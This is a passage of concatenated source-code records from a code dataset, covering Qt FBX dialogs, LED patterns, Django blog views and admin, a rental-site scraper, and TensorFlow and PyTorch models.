self._ok_button.setDefault(True)\n\n width = 500\n height = 700\n\n if parent:\n pos = parent.mapToGlobal(parent.rect().topLeft())\n\n self.setGeometry(\n pos.x() + 50,\n pos.y() + 50,\n # 0, 0,\n width,\n height\n )\n\n else:\n self.setGeometry(\n 100,\n 100,\n width,\n height\n )\n\n def apply_default_title(self):\n self.setWindowTitle(\"IO Settings\")\n\n def _create_widgets(self):\n\n self._item_manager = bfPropertyItems.BfFbxPropertyTreeItemManager(self.fbx_manager())\n self._item_manager.set_debug_level(self._item_manager.LEVELS.mid())\n self._item_manager.set_fbx_object(self._settings)\n\n self._model = bfQtPropertyModels.BfFbxPropertyModel()\n self._model.set_item_manager(self._item_manager)\n\n # self._properties_widget = bfQtPropertyTreeWidgets.BfPropertyTreeWidget()\n self._properties_widget = bfQtPropertyTreeWidgets.BfPropertyTreeView(self.bf_environment())\n self._properties_widget.set_use_deligate(True)\n self._properties_widget.setModel(self._model)\n self._properties_widget.setColumnHidden(2, True)\n self._properties_widget.setColumnWidth(0, 300)\n\n # buttons\n self._ok_button = QtWidgets.QPushButton(\"OK\")\n self._cancel_button = QtWidgets.QPushButton(\"Cancel\")\n\n # Button signals\n self._ok_button.clicked.connect(self.accept)\n self._cancel_button.clicked.connect(self.reject)\n\n def _create_xml_menu(self):\n # import/export xml btns\n self._menu_btn = QtWidgets.QPushButton(\"...\")\n\n self._menu = QtWidgets.QMenu()\n self._menu_btn.setMenu(self._menu)\n\n _icon = QtGui.QIcon()\n self._import_xml_action = QtWidgets.QAction(_icon, 'Import XML', self)\n self._export_xml_action = QtWidgets.QAction(_icon, 'Export XML', self)\n\n self._menu.addAction(self._import_xml_action)\n self._menu.addAction(self._export_xml_action)\n\n self._import_xml_action.triggered.connect(self.import_xml)\n self._export_xml_action.triggered.connect(self.export_xml)\n\n def _create_layout(self):\n self._lyt = QtWidgets.QVBoxLayout()\n self.setLayout(self._lyt)\n\n self._xml_layout = QtWidgets.QHBoxLayout()\n self._xml_layout.addWidget(self._menu_btn)\n self._xml_layout.addStretch()\n\n self._button_layout = QtWidgets.QHBoxLayout()\n self._button_layout.addWidget(self._ok_button)\n self._button_layout.addWidget(self._cancel_button)\n\n self._lyt.addLayout(self._xml_layout)\n self._lyt.addWidget(self._properties_widget)\n self._lyt.addLayout(self._button_layout)\n\n def settings(self):\n return self._settings\n\n def set_import_mode(self, value):\n if value:\n import_property = self._settings.FindProperty(\"Import\")\n self._model.set_root_fbx_property(import_property)\n self.setWindowTitle(\"Import Settings\")\n self._properties_widget.expandAll()\n else:\n self._model.set_root_fbx_property(None)\n self.apply_default_title()\n\n def set_export_mode(self, value):\n if value:\n export_property = self._settings.FindProperty(\"Export\")\n self._model.set_root_fbx_property(export_property)\n self.setWindowTitle(\"Export Settings\")\n self._properties_widget.expandAll()\n else:\n self._model.set_root_fbx_property(None)\n self.apply_default_title()\n\n def import_xml(self):\n\n file_path, file_type = QtWidgets.QFileDialog.getOpenFileName(\n self,\n 'Import XML file',\n # self._default_path,\n None,\n \"xml files (*.xml)\"\n )\n\n if file_path == \"\":\n return\n\n\n self._model.beginResetModel()\n res = self._settings.ReadXMLFile(file_path)\n # self.item_manager().rebuild()\n self._model.endResetModel()\n self._properties_widget.expandAll()\n\n return res\n\n def export_xml(self):\n file_path, file_type = QtWidgets.QFileDialog.getSaveFileName(\n self,\n 'Export XML file',\n # self._file_path or self._default_path,\n None,\n \"xml files (*.xml)\"\n )\n\n if file_path == \"\":\n return False\n\n res = self._settings.WriteXMLFile(file_path)\n return res\n\n\nclass BfMergeSettingsDialog(\n # bpDebug.BpDebugObject,\n bfCore.BfManagerBase,\n # QtWidgets.QWidget\n QtWidgets.QDialog\n):\n \"\"\"\n \"\"\"\n\n def __init__(self, fbx_manager, parent=None, *args, **kwargs):\n super(BfMergeSettingsDialog, self).__init__(fbx_manager, parent=parent, *args, **kwargs)\n\n self.setWindowTitle(\"Merge Settings\")\n\n self._settings = bfIO.BfMergeSettingsObject.create(self.fbx_manager(), \"mergeSettings\")\n self.add_debug_object(self._settings)\n\n self._create_widgets()\n self._create_layout()\n\n self._ok_button.setDefault(True)\n\n width = 500\n height = 700\n\n if parent:\n pos = parent.mapToGlobal(parent.rect().topLeft())\n\n self.setGeometry(\n pos.x() + 50,\n pos.y() + 50,\n # 0, 0,\n width,\n height\n )\n\n else:\n self.setGeometry(\n 100,\n 100,\n width,\n height\n )\n\n def _create_widgets(self):\n\n self._item_manager = bfPropertyItems.BfFbxPropertyTreeItemManager(self.fbx_manager())\n self.add_debug_object(self._item_manager)\n\n self._item_manager.set_fbx_object(self._settings.fbx_object())\n\n self._model = bfQtPropertyModels.BfFbxPropertyModel()\n self._model.set_item_manager(self._item_manager)\n\n # self._properties_widget = bfQtPropertyTreeWidgets.BfPropertyTreeWidget()\n self._properties_widget = bfQtPropertyTreeWidgets.BfPropertyTreeView(self.bf_environment())\n self._properties_widget.set_use_deligate(True)\n self.add_debug_object(self._properties_widget)\n\n self._properties_widget.setModel(self._model)\n self._properties_widget.setColumnHidden(2, True)\n self._properties_widget.setColumnWidth(0, 300)\n self._properties_widget.expandAll()\n\n # buttons\n self._ok_button = QtWidgets.QPushButton(\"OK\")\n self._cancel_button = QtWidgets.QPushButton(\"Cancel\")\n\n # Button signals\n self._ok_button.clicked.connect(self.accept)\n self._cancel_button.clicked.connect(self.reject)\n\n def _create_layout(self):\n self._lyt = QtWidgets.QVBoxLayout()\n self.setLayout(self._lyt)\n\n self._button_layout = QtWidgets.QHBoxLayout()\n self._button_layout.addWidget(self._ok_button)\n self._button_layout.addWidget(self._cancel_button)\n\n self._lyt.addWidget(self._properties_widget)\n self._lyt.addLayout(self._button_layout)\n\n def settings(self):\n return self._settings\n\nclass Test1(object):\n def __init__(self):\n self.fbx_manager = fbx.FbxManager.Create()\n\n self._widget = BfIOSettingsDialog(self.fbx_manager)\n self._widget.set_import_mode(True)\n\n self._widget.show()\n\n\nif __name__ == \"__main__\":\n # test_1()\n\n app = QtWidgets.QApplication(sys.argv)\n\n test = Test1()\n\n sys.exit(app.exec_())\n","sub_path":"python/brenfbx/qt/dialog/bfIOSettingsDialogs.py","file_name":"bfIOSettingsDialogs.py","file_ext":"py","file_size_in_byte":8662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"211500244","text":"#!/usr/bin/env python3\nimport time\nimport random\nfrom timeit import default_timer\n\nfrom auxiliary import RGB\nfrom patternhandler import PatternHandler\n\n# Pattern Import\nfrom pattern.positionslichter import Positionslichter\nfrom pattern.flicker import Flicker, noise_flicker\nfrom effect.lightrun import LightRun\nfrom effect.sparkle import Sparkle\nfrom effect.sweepglow import Sweep\nfrom effect.glow import gloweffect, glowtail\nfrom effect.reveal import reveal\nfrom pattern.bodyglow import RedSparkl, Rainbowbody, Rainbowsweep\n# from effect.glow import *\n\n\nclass Mainclass:\n def __init__(self):\n self.api = PatternHandler()\n self.api.start()\n self.clock = Clock()\n\n def flicker_and_lightrun(self, duration):\n flicker = Flicker()\n flicker.set_brightness(0.4)\n # flicker.fade(0.7)\n self.api.runPattern(flicker)\n self.clock.start()\n while self.clock.wait(duration):\n effect = LightRun()\n self.api.runPattern(effect)\n time.sleep(5)\n self.api.stopPattern(flicker)\n\n def red_and_sparkle(self, duration):\n red = RedSparkl()\n red.set_brightness(0.7)\n self.api.runPattern(red)\n self.clock.start()\n while self.clock.wait(duration):\n sleeptime = random.randint(15, 60)\n print(\"Gewitter in {} Sekunden\".format(sleeptime))\n time.sleep(sleeptime)\n effect = Sparkle()\n self.api.runPattern(effect)\n\n self.api.stopPattern(red)\n\n def sweep_and_glow(self, duration):\n takt = 1.1\n self.clock.start()\n pos = 0\n while self.clock.wait(duration):\n color1 = RGB.wheel(pos)\n color2 = RGB.wheel(pos + 100)\n\n effect = Sweep(color1)\n effect.fade(0.9)\n self.api.runPattern(effect)\n time.sleep(takt)\n\n effect = gloweffect(range(150), color1, color2, int(2.3 * takt * 60))\n self.api.runPattern(effect)\n time.sleep(3 * takt)\n\n pos = (pos + 40) % 255\n\n def reveal(self, duration):\n self.clock.start()\n while self.clock.wait(duration):\n effect = reveal()\n effect.fade(0.998)\n self.api.runPattern(effect)\n effect.wait_for()\n time.sleep(3)\n\n def whitenoise(self, duration):\n pat = noise_flicker()\n self.api.runPattern(pat)\n self.clock.start()\n while self.clock.wait(duration):\n time.sleep(10)\n\n self.api.stopPattern(pat)\n\n def rainbow(self, duration):\n pat1 = Rainbowbody()\n pat2 = Rainbowsweep()\n self.api.runPattern(pat1)\n self.api.runPattern(pat2)\n\n self.clock.start()\n while self.clock.wait(duration):\n wait = random.randint(5, 15)\n time.sleep(wait)\n effect = glowtail()\n\n self.api.runPattern(effect)\n\n self.api.stopPattern(pat1)\n self.api.stopPattern(pat2)\n\n def run(self):\n poslichter = Positionslichter()\n self.api.runPattern(poslichter)\n\n duration = 90\n\n while True:\n self.api.setFramerate(60)\n # self.rainbow(duration)\n # self.whitenoise(duration)\n self.flicker_and_lightrun(duration)\n self.red_and_sparkle(duration)\n self.sweep_and_glow(duration)\n self.reveal(duration)\n\n self.api.stopPattern(poslichter)\n self.api.stop()\n\n\nclass Clock:\n def __init__(self):\n self.starttime = default_timer()\n\n def start(self):\n self.starttime = default_timer()\n\n def wait(self, seconds):\n now = default_timer()\n diff = now - self.starttime\n\n if diff > seconds:\n return False\n else:\n return True\n\n\nif __name__ == \"__main__\":\n main = Mainclass()\n main.run()\n","sub_path":"source/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":3886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"642710606","text":"import sys\n\ni = int()\nj = 1\nprint(sys.getsizeof(i))\nprint(sys.getsizeof(j))\n\n# str = \"This is a String\"\n# foo = 1\n# bar = str(foo)\n# print(bar) # ==> problem here\n\na = [1,2]\nprint(a.count(1))\ncount = 1\nprint(a.count(1))\n\nA = [[1, 3, 7],\n [4, 8, 1]]\n\nr, (c, l) = max(map(lambda t: (t[0], max(enumerate(t[1]), key=lambda v: v[1])), enumerate(A)), key=lambda v: v[1][1])\n\n\n\n# this works\ndef matrix_max_index(M, m, n):\n max_val = M[0][0]\n max_val_index = (0, 0)\n for i, row in enumerate(M):\n if max(row) > max_val:\n max_val = max(row)\n max_val_index = i, row.index(max_val)\n return max_val_index\n\nnums =input().split()\nm = int(nums[0])\nn = int(nums[1])\nM = list()\nfor i in range(0,m):\n current_row_strings = input().split()\n M.append([])\n for j in range(0,n):\n M[i].append(int(current_row_strings[j]))\n\n(i,j) = matrix_max_index(M, m, n)\nprint(i,j)\n\n\n#v2\ndef matrix_max_index(M, m, n):\n max_val = max_row = None\n for i, row in enumerate(M):\n if max_val is None or max(row) > max_val:\n max_val = max(row)\n max_row = i\n return max_row, M[max_row].index(max_val)\n\nnums =input().split()\nm = int(nums[0])\nn = int(nums[1])\nM = list()\nfor i in range(0,m):\n current_row_strings = input().split()\n M.append([])\n for j in range(0,n):\n M[i].append(int(current_row_strings[j]))\n\n(i,j) = matrix_max_index(M, m, n)\nprint(i,j)\n\n\n# v3\ndef matrix_max_index(M, m, n):\n max_val, max_row = M[0][0], 0\n for i, row in enumerate(M):\n local_max = max(row)\n (max_val, max_row) = (local_max, i) if local_max > max_val else (max_val, max_row)\n return max_row, M[max_row].index(max_val)\n\nnums =input().split()\nm = int(nums[0])\nn = int(nums[1])\nM = list()\nfor i in range(0,m):\n current_row_strings = input().split()\n M.append([])\n for j in range(0,n):\n M[i].append(int(current_row_strings[j]))\n\n(i,j) = matrix_max_index(M, m, n)\nprint(i,j)","sub_path":"bar.py","file_name":"bar.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"207681455","text":"# coding=utf-8\n\n\"\"\"\n\n\"\"\"\n\nfrom __future__ import division, print_function, unicode_literals\nfrom sacred import Experiment\n\n# create an experiemnt and name it\nex = Experiment(\"hello_config_scope\")\n\n# A ConfigScope is a function decorated with @ex.config\n# All variables of this function will be put into the configuration\n\n@ex.config\ndef cfg(_log):\n greeting = \"Hello\"\n recepient = \"Prithvi\"\n message = f\"{greeting}\\! {recepient}\"\n\n\n# We can access all the variables in function with @ex.config decoration\n@ex.automain\ndef main(message):\n print(message) # OKAY\n print(greeting) # ERROR: greeting is not passed to the enclosing method\n\n","sub_path":"flashSwift/sacred/03_hello_config_scope.py","file_name":"03_hello_config_scope.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"31891759","text":"import math\n\nimport numpy as np\nimport tensorflow as tf\nfrom rbm import RBM\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nclass NN(object):\n '''\n 定义预测的神经网络\n '''\n def __init__(self, sizes, X, Y):\n # 初始化超参数\n self._sizes = sizes\n self._X = X\n self._Y = Y\n self.w_list = []\n self.b_list = []\n self._learning_rate = 1.0\n self._momentum = 0.0\n self._epoches = 100\n self._batchsize = 100\n input_size = X.shape[1]\n\n # 初始循环\n for size in self._sizes + [Y.shape[1]]:\n # 定义RBM层数加1层输出层参数\n max_range = 4 * math.sqrt(6. / (input_size + size))\n\n # 通过随机分布来初始化\n self.w_list.append(np.random.uniform( -max_range, max_range, [input_size, size]).astype(np.float32))\n\n # 初始化偏置\n self.b_list.append(np.zeros([size], np.float32))\n input_size = size\n\n def load_from_rbms(self, dbn_sizes,rbm_list):\n # 从rbms中读取数据\n for i in range(len(self._sizes)):\n # 将前n-1组的权重赋值\n self.w_list[i] = rbm_list[i].w\n self.b_list[i] = rbm_list[i].hb\n\n def train(self):\n # 开始训练\n _a = [None] * (len(self._sizes) + 2)\n _w = [None] * (len(self._sizes) + 1)\n _b = [None] * (len(self._sizes) + 1)\n _a[0] = tf.placeholder(\"float\", [None, self._X.shape[1]])\n y = tf.placeholder(\"float\", [None, self._Y.shape[1]])\n\n # 定义变量和训练误差\n for i in range(len(self._sizes) + 1):\n _w[i] = tf.Variable(self.w_list[i])\n _b[i] = tf.Variable(self.b_list[i])\n for i in range(1, len(self._sizes) + 2):\n _a[i] = tf.nn.sigmoid(tf.matmul(_a[i - 1], _w[i - 1]) + _b[i - 1])\n\n # 定义损失函数\n cost = tf.reduce_mean(tf.square(_a[-1] - y))\n\n train_op = tf.train.MomentumOptimizer(self._learning_rate, self._momentum).minimize(cost)\n\n # 预测操作\n predict_op = tf.argmax(_a[-1], 1)\n\n # 训练循环\n with tf.Session() as sess:\n #Initialize Variables\n sess.run(tf.global_variables_initializer())\n\n # 开始训练\n for i in range(self._epoches):\n for start, end in zip(range(0, len(self._X), self._batchsize), range(self._batchsize, len(self._X), self._batchsize)):\n sess.run(train_op, feed_dict={_a[0]: self._X[start:end], y: self._Y[start:end]})\n for j in range(len(self._sizes) + 1):\n self.w_list[j] = sess.run(_w[j])\n self.b_list[j] = sess.run(_b[j])\n self.b_list[j] = sess.run(_b[j])\n print(\"Accuracy rating for epoch \" + str(i) + \": \" + str(np.mean(np.argmax(self._Y, axis=1) ==\n sess.run(predict_op, feed_dict={_a[0]: self._X, y: self._Y}))))\n\n\n# 读取数据\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\ntrX, trY, teX, teY = mnist.train.images, mnist.train.labels, mnist.test.images, mnist.test.labels\n# 创建3个RBM模型\nRBM_hidden_sizes = [500, 200, 50]\ninpX = trX\n# 保存模型\nrbm_list = []\n\n# 输入数量\ninput_size = inpX.shape[1]\n\n# 对RBM模型开始训练\nprint('Pre_train begins!')\nfor i, size in enumerate(RBM_hidden_sizes):\n print('RBM: ', i, ' ', input_size, '->', size)\n rbm_list.append(RBM(input_size, size))\n input_size = size\nfor rbm in rbm_list:\n print('New RBM:')\n rbm.train(inpX)\n inpX = rbm.rbm_outpt(inpX)\nprint('Train begins!')\nnNet = NN(RBM_hidden_sizes, trX, trY)\nnNet.load_from_rbms(RBM_hidden_sizes,rbm_list)\nnNet.train()","sub_path":"Algor/DeepBeliefN/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"413245070","text":"# mcu_app/admin.py\nfrom django.contrib import admin\nfrom django.urls import reverse\nfrom django.utils.html import format_html\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom mcu_app.models import Source, SourceHierarchy, Character, Event, Ref, Reflink\n\ndef linkify(field_name, many=False):\n \"\"\"\n Converts a foreign key value into clickable links.\n https://stackoverflow.com/questions/37539132/\n\n If field_name is 'parent', link text will be str(obj.parent)\n Link will be admin url for the admin url for obj.parent.:change\n \"\"\"\n def _linkify(obj):\n linked_obj = getattr(obj, field_name)\n if not getattr(obj, field_name):\n return None\n c = ContentType.objects.get_for_model(obj)\n\n if not many:\n lc = ContentType.objects.get_for_model(linked_obj)\n view_name = f\"admin:{c.app_label}_{lc.model}_change\"\n link_url = reverse(view_name, args=[linked_obj.pk])\n return format_html('{}', link_url, linked_obj)\n else:\n if not linked_obj.all():\n return None\n\n lc = ContentType.objects.get_for_model(linked_obj.all()[0])\n view_name = f\"admin:{c.app_label}_{lc.model}_change\"\n m2m_linked_objs = [{\n 'link_url': reverse(view_name, args=[obj.pk]), \n 'link_name': obj.pk,\n } for obj in linked_obj.all()]\n return format_html(', '.join([format_html('{}', obj['link_url'], obj['link_name']) \n for obj in m2m_linked_objs])\n )\n\n _linkify.short_description = field_name # Sets column name\n return _linkify\n\n\nclass SourceAdmin(admin.ModelAdmin):\n def events_count(self, obj):\n return obj.events.count()\n fieldsets = [\n (None, {'fields': ['sid', 'parent', 'title', 'type']}),\n ('Details', {'fields': ['details_formatted']}),\n ]\n list_display = ('sid', linkify(field_name='parent'), 'title', 'type', 'details', 'events_count')\n readonly_fields = ('details', 'details_formatted')\n search_fields = ('sid', 'title',)\n\n\nclass SourceHierarchyAdmin(admin.ModelAdmin):\n fieldsets = [('Hierarchy', {'fields': ['hierarchy_formatted']})]\n readonly_fields = ('hierarchy', 'hierarchy_formatted')\n\n\nclass CharacterAdmin(admin.ModelAdmin):\n def events_count(self, obj):\n return obj.events.count()\n list_display = ('cid', 'cid_redirects', 'real_name', 'events_count', linkify(field_name='events', many=True))\n search_fields = ('cid', )\n\nclass EventAdmin(admin.ModelAdmin):\n list_display = ('eid', 'filename', 'date', 'reality', 'title',\n linkify(field_name='sources', many=True), \n linkify(field_name='characters', many=True), \n linkify(field_name='reflinks', many=True),\n 'desc',\n )\n search_fields = ('eid', 'sources__sid')\n\n\nclass RefAdmin(admin.ModelAdmin):\n list_display = ('rid', 'name', 'desc', 'source')\n search_fields = ('rid', )\n\nclass ReflinkAdmin(admin.ModelAdmin):\n list_display = ('lid', \n linkify(field_name='evt'), \n linkify(field_name='src'), \n linkify(field_name='ref'),\n )\n search_fields = ('lid', 'evt__eid' )\n\nadmin.site.register(Source, SourceAdmin)\nadmin.site.register(SourceHierarchy, SourceHierarchyAdmin)\nadmin.site.register(Character, CharacterAdmin)\nadmin.site.register(Event, EventAdmin)\nadmin.site.register(Ref, RefAdmin)\nadmin.site.register(Reflink, ReflinkAdmin)\n","sub_path":"mcu_app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"31679466","text":"from urllib.parse import quote_plus\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.utils import timezone\nfrom django.core.paginator import Paginator\nfrom django.db.models import Q\nfrom .models import Post\nfrom .forms import PostForm\nfrom comments.models import Comment\nfrom comments.forms import CommentForm\n\n\n@login_required\ndef post_create(request):\n\n form = PostForm(request.POST or None, request.FILES or None)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.user = request.user\n instance.save()\n messages.success(request, \"Successfuly Created\")\n return HttpResponseRedirect(f'/{instance.slug}/')\n\n button_variables = \"Create\"\n context = {\n 'form': form,\n 'button_variables': button_variables\n }\n return render(request, 'post_form.html', context)\n\n\ndef post_detail(request, slug):\n today = timezone.now().date()\n instance = get_object_or_404(Post, slug=slug)\n if instance.publish > timezone.now().date() or instance.draft:\n if not request.user.is_authenticated or not request.user.is_staff or not request.user.is_superuser:\n raise Http404\n\n initial_data = {\n \"content_type\": instance.get_content_type,\n \"object_id\": instance.id\n }\n comment_form = CommentForm(request.POST or None, initial=initial_data)\n if comment_form.is_valid():\n c_type = comment_form.cleaned_data.get(\"content_type\")\n\n content_type = ContentType.objects.get(model=c_type)\n object_id = comment_form.cleaned_data.get(\"object_id\")\n content = comment_form.cleaned_data.get(\"content\")\n parent_obj = None\n try:\n parent_id = int(request.POST.get(\"parent_id\"))\n except:\n parent_id = None\n\n if parent_id:\n parent_qs = Comment.objects.filter(id=parent_id)\n if parent_qs.exists() and parent_qs.count() == 1:\n parent_obj = parent_qs.first()\n\n new_comment, created = Comment.objects.get_or_create(\n user=request.user,\n content_type=content_type,\n object_id=object_id,\n content=content,\n parent=parent_obj\n )\n\n return HttpResponseRedirect(f'/{instance.slug}/')\n\n comments = instance.comments\n share_string = quote_plus(instance.content)\n context = {\n \"title\": instance.title,\n \"instance\": instance,\n \"share_string\": share_string,\n \"today\": today,\n \"comment_form\": comment_form,\n \"comments\": comments,\n }\n return render(request, 'post_detail.html', context)\n\n\ndef post_list(request):\n today = timezone.now().date()\n query_list = Post.objects.active()\n\n if request.user.is_staff or request.user.is_superuser:\n query_list = Post.objects.all().order_by('-timestamp')\n\n search = request.GET.get('search')\n if search:\n query_list = query_list.filter(\n Q(title__icontains=search) or\n Q(content__icontains=search)\n ).distinct()\n paginator = Paginator(query_list, 6)\n page_request_var = \"page\"\n page = request.GET.get(page_request_var)\n query_set = paginator.get_page(page)\n\n context = {\n \"title\": \"My User List\",\n \"object_list\": query_set,\n \"page_request_var\": page_request_var,\n \"today\": today\n }\n\n return render(request, 'post_list.html', context)\n\n\n@login_required\ndef post_update(request, slug):\n\n instance = get_object_or_404(Post, slug=slug)\n\n if request.user == instance.user or request.user.is_superuser:\n form = PostForm(request.POST or None, request.FILES or None, instance=instance)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.save()\n messages.success(request, \"Post Updated\")\n return HttpResponseRedirect(f'/{instance.slug}/')\n else:\n raise Http404(\"You Dont Have Permission to delete this post\")\n\n button_variables = \"Update\"\n context = {\n \"title\": instance.title,\n \"instance\": instance,\n \"button_variables\": button_variables,\n \"form\": form\n }\n return render(request, 'post_form.html', context)\n\n\n@login_required\ndef post_delete(request, slug):\n\n instance = get_object_or_404(Post, slug=slug)\n\n if request.user == instance.user or request.user.is_superuser:\n instance.delete()\n messages.success(request, \"Successfuly Deleted\")\n return redirect('posts:list')\n else:\n raise Http404(\"You Dont Have Permission to delete this post\")\n","sub_path":"posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"593433073","text":"# -*- coding: utf-8 -*-\n# Copyright (C) 2016-Today: La Louve ()\n# @author: La Louve\n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).\nfrom openerp import fields, models, api, _\nfrom openerp.exceptions import Warning\n\nclass ProductTemplate(models.Model):\n _inherit = 'product.template'\n\n @api.multi\n def write(self, vals):\n if 'available_in_pos' in vals and not vals['available_in_pos']:\n self.check_pos_session_running()\n return super(ProductTemplate, self).write(vals)\n\n @api.multi\n def check_pos_session_running(self):\n pos_sessions = self.env['pos.session'].search(\n [('state', 'in', ['opening_control', 'opened'])])\n if pos_sessions:\n raise Warning(_(\n 'You cannot unticking Available in the Point of Sale '\n 'When POS Session are running with ids %s') % pos_sessions.ids)\n return True\n","sub_path":"intercoop_addons/coop_point_of_sale/models/product_template.py","file_name":"product_template.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"468051182","text":"__author__ = 'speky'\n\nimport requests\nimport bs4\nimport operator\nimport base\n\n\nclass IngatlanBazarSearch(base.BaseSearch):\n\n def __init__(self):\n base.BaseSearch.__init__(self)\n self.root_url = 'http://ingatlanbazar.hu/'\n self.index_url = self.root_url + '/HU/ingatlan-'\n self.districts = {'I':202, 'II':197, 'III': 213, 'IV':199, 'V':208, 'VI':212, 'VII':217, 'VIII':214, 'IX':216, 'X':204,\n 'XI':209, 'XII':205, 'XIII':210, 'XIV':211, 'XV':206,'XVI':201, 'XVII':196, 'XVIII':245, 'XIX':198, 'XX':200,\n 'XXI':207, 'XXII':203, 'XXIII':218}\n\n def set_params(self, min_cost, max_cost, min_size, max_size, dog, furniture, district):\n self.url = self.index_url\n self.url += '+'+self.__set_district(district)\n if furniture == 1:\n self.url += self.furniture_string\n # self.url += \"+\"+str(min_size)+\"-\"+str(max_size)+\"-m2\"\n self.url += self.cost_string+str(min_cost)+\"-\"+str(max_cost)+\"-ezer-Ft\"\n print(self.url)\n\n def get_urls(self):\n _lastPage = int(self.__get_max_page_number())\n print(\"lastpage: \"+str(_lastPage))\n for pageNumber in range(1, _lastPage + 1):\n # print (\"pageNumber: \" + str(pageNumber))\n self.__get_page_urls(pageNumber)\n return self.numberOflinks\n\n def __get_max_page_number(self):\n _response = requests.get(self.url)\n # fix if bug in the response html\n text = _response.text.replace(\"!–[\", \"!--[\")\n _soup = bs4.BeautifulSoup(text)\n _max = _soup.find('li', attrs={'class': 'numbers'})\n if _max == None:\n return 0\n _maxTxt = _max.text\n _maxTxt = _maxTxt.replace('\\n', '')\n # get max page number\n _pageNum = _maxTxt.split()[-1]\n #truncate '-bol' string from the end of it\n return _pageNum[:-4]\n\n def __get_page_urls(self, pageNum):\n _response = requests.get(self.url+\"?page=\"+str(pageNum))\n # fix if bug in the response html\n _text = _response.text.replace(\"!–[\", \"!--[\")\n _soup = bs4.BeautifulSoup(_text)\n # find the rent box div\n _divs = _soup.find_all('tr', attrs={'class': 'list-row'})\n for div in _divs:\n self.numberOflinks += 1\n link = self.__get_link(div)\n street = self.__get_address(div)\n price = self.__get_price(div)\n size = self.__get_area_size(div)\n self.rentHouses[link] = {'address': street, 'price': price, 'size': size, 'distance': 0}\n\n def __set_district(self, district):\n if len(district) == 0:\n return \"Magyarorszag-Lakas-Kiado-8-10-2\"\n _result = \"Magyarorszag-Lakas-Kiado-8-10-\"\n for num in district.split('+'):\n id = num\n id = str(id).upper()\n _result += str(self.districts[id]) + ','\n _result = _result[:-1]\n print(_result)\n return _result\n\n def __get_link(self, div):\n address = div.find('td', attrs={'class': 'thumbnail'})\n _link = address.find('a')['href']\n if _link.startswith('/'):\n return self.root_url + _link\n return _link\n\n def __get_address(self, div):\n _section = div.find('td', attrs={'class': 'address'})\n _district = _section.text\n _address = _district.replace('\\n', '').strip()\n return _address\n\n def __get_area_size(self, div):\n _results = div.find_all('td', attrs={'class': 'centered'})\n _size = _results[1].text\n _size = ''.join(_size.split())\n # remove m2 string from the end\n return _size[:-2]\n\n def __get_price(self, div):\n _price = div.find('td', attrs={'class': 'centered'})\n _price = _price.text\n _price = ''.join(_price.split())\n return _price[:-5]\n","sub_path":"renthouse/ingatlanbazar.py","file_name":"ingatlanbazar.py","file_ext":"py","file_size_in_byte":3901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"35592615","text":"import torch\r\nimport torch.nn as nn\r\n\r\nimport torch.nn.functional as F\r\n\r\nWORD_EMBED_SIZE = 300\r\nNUM_LSTM_LAYERS = 2\r\nHIDDEN_LSTM_SIZE = 512\r\nIMAGE_FEATURES = 2048\r\nMID_FEATURES = 1024\r\nA_MID_FEATURES = 512\r\nDROPOUT = 0.5\r\nGLIMPSES = 2\r\nTEXT_FEATURES = NUM_LSTM_LAYERS * HIDDEN_LSTM_SIZE\r\n\r\n\r\nclass TextEncoder(nn.Module):\r\n def __init__(self, input_text_size):\r\n super(TextEncoder, self).__init__()\r\n self.embedding = nn.Embedding(input_text_size, WORD_EMBED_SIZE)\r\n self.activation = nn.Tanh()\r\n self.drop = nn.Dropout(DROPOUT)\r\n self.lstm = nn.LSTM(WORD_EMBED_SIZE, HIDDEN_LSTM_SIZE, NUM_LSTM_LAYERS)\r\n nn.init.xavier_uniform_(self.embedding.weight)\r\n for w in self.lstm.weight_ih_l0.chunk(4, 0):\r\n nn.init.xavier_uniform_(w)\r\n for w in self.lstm.weight_hh_l0.chunk(4, 0):\r\n nn.init.xavier_uniform_(w)\r\n self.lstm.bias_ih_l0.data.zero_()\r\n self.lstm.bias_hh_l0.data.zero_()\r\n\r\n def forward(self, question):\r\n qst_vec = self.embedding(question)\r\n qst_vec = self.activation(self.drop(qst_vec))\r\n qst_vec = qst_vec.transpose(0, 1)\r\n _, (hidden, cell) = self.lstm(qst_vec)\r\n qst_feature = cell.transpose(0, 1)\r\n qst_feature = qst_feature.reshape(qst_feature.size()[0], -1)\r\n\r\n return qst_feature\r\n\r\n\r\nclass AttentionModel(nn.Module):\r\n def __init__(self):\r\n super(AttentionModel, self).__init__()\r\n self.image_convolution = nn.Conv2d(IMAGE_FEATURES, A_MID_FEATURES, 1,\r\n bias=False) # let self.lin take care of bias\r\n self.question_linear = nn.Linear(TEXT_FEATURES, A_MID_FEATURES)\r\n self.result_convolution = nn.Conv2d(A_MID_FEATURES, GLIMPSES, 1)\r\n\r\n self.drop = nn.Dropout(DROPOUT)\r\n self.relu = 